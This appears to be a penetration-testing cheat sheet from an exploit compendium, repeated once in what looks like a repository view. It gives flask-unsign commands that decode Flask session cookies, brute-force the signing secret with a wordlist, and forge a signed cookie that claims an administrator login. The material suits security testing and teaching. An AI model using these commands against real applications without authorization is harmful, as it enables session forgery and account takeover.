killchain-compendium/Exploits/Python/Flask Cookies.md

# Flask Cookies

They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.

## Read Flask Cookie

Using `flask-unsign` this can be done via
```sh
flask-unsign --decode --cookie '<COOKIE>'
```

## Unsign the Flask Cookie

Unsigning the cookie can be done in the following way
```sh
flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
```

## Sign the Flask Cookie

Siging the cookie can be done via
```sh
flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
```
sqli 2023-02-19 20:16:49 +01:00			`# Flask Cookies`

			`They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.`
			`Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.`

			`## Read Flask Cookie`

			Using `flask-unsign` this can be done via
			```sh
			`flask-unsign --decode --cookie '<COOKIE>'`
			```

			`## Unsign the Flask Cookie`

			`Unsigning the cookie can be done in the following way`
			```sh
			`flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval`
			```

			`## Sign the Flask Cookie`

			`Siging the cookie can be done via`
			```sh
			`flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'`
			```